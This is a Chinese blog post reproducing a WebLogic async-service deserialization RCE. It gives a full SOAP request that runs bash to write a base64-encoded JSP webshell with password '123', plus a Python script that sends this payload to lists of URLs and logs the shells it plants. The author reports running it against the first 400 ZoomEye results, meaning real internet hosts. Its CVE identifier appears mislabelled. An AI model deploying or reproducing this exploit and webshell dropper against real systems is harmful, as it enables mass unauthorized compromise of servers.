weblogic新反序列化rce复现

Writing

创建时间:2019-04-26 19:28

阅读:

前言
复现过程
批量检测脚本

前言

据说又有新的weblogic反序列化爆出来了？滑稽
既然如此我来蹭波热度

BGM:女王蜂

复现过程

根据此文章进行复现:https://www.jianshu.com/p/c4982a845f55

环境准备

使用vulhub里的CVE-2017-10271进行复现
进入对应的文件夹执行docker-compose up -d

访问http://127.0.0.1:7001

根据上面的文章一开始请求:

http://192.168.241.132:7001/_async/AsyncResponseService

如果页面如上图所示，表示可能存在漏洞

根据文章中的写webshell第一种方式

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.241.132:7001
Content-Length: 1383
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

测试是否成功getshell

批量检测脚本

#author:九世
#time:2019/4/26

import gevent
from gevent import  monkey;monkey.patch_all()
import requests
import os
import sys
from multiprocessing import Process

class Weblogic:
    def __init__(self,headers,data,path):
        self.headers=headers
        self.data=data
        self.path=path

    def exploit(self,url):
        urls='{}{}'.format(str(url).rstrip('/').strip(),self.path)
        urls2='{}{}'.format(str(url).rstrip('/').strip(),'/_async/webshells.jsp')
        try:
            rqt=requests.get(url=urls,headers=self.headers)
            if rqt.status_code==200 and 'Test page' in rqt.text:
                rvt=requests.post(url=urls,headers=self.headers,data=self.data,timeout=3)
                if rvt.status_code==202:
                    rbt=requests.get(url=urls2,headers=headers)
                    if rbt.status_code==200 and not '404' in rbt.text:
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2,'123','{}?pwd=123&cmd=whoami'.format(urls2)))
                        print('[+] weblogic反序列化漏洞利用成功,ip:{} password:{} 利用方式如:{}'.format(urls2, '123','{}?pwd=123&cmd=whoami'.format(urls2)),file=open('save.txt','a',encoding='utf-8'))
                    else:
                        print('[-] 利用失败 url:{} 状态码:{}'.format(rbt.url,rbt.status_code))
                else:
                    print('[-] 利用失败 url:{} 状态码:{}'.format(rvt.url,rvt.status_code))
            else:
                print('[-] 不存在weblogic反序列化漏洞-CVE-2019-48814 http状态码:{} url:{}'.format(rqt.status_code,urls))
        except:
            pass

    def xc(self,rw):
        xs=[]
        for r in rw:
            xs.append(gevent.spawn(self.exploit,r))

        gevent.joinall(xs)

    def djc(self,id):
        url_list=[]
        calc=0
        if str(id)=='1':
            print('[+] 单个url检测')
            xw=input('url>')
            self.exploit(url=xw)
        elif str(id)=='2':
            print('[+] 批量检测')
            xw=input(r'文件路径>')
            if os.path.exists(xw):
                print('[+] 找到对应的文件')
                with open(xw,'r',encoding='utf-8') as x:
                    calc+=1
                    if calc==100:
                        p=Process(target=self.xc,args=(url_list,))
                        p.start()
                        calc=0
                        url_list.clear()

                    for r in x.readlines():
                        qc="".join(r.split('\n'))
                        url_list.append(qc)

                if len(url_list)>0:
                    b = Process(target=self.xc, args=(url_list,))
                    b.start()
            else:
                print('[-] 找不到对应的文件')
                exit()


if __name__ == '__main__':
    headers={'user-agent':'Apache-HttpClient/4.1.1 (java 1.5)','Connection':'keep-alive','content-type': 'text/xml','Accept-Encoding':'gzip, deflate'}
    path='/_async/AsyncResponseService'
    data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>"""
    obj=Weblogic(headers=headers,data=data,path=path)
    obj.djc(sys.argv[1])

测试结果：
PS:这里的测试url都是zoomeye前400条

利用失败图

仓库地址

https://github.com/422926799/python/tree/master/CVE-2019-48814%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7

转载请声明:转自422926799.github.io

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。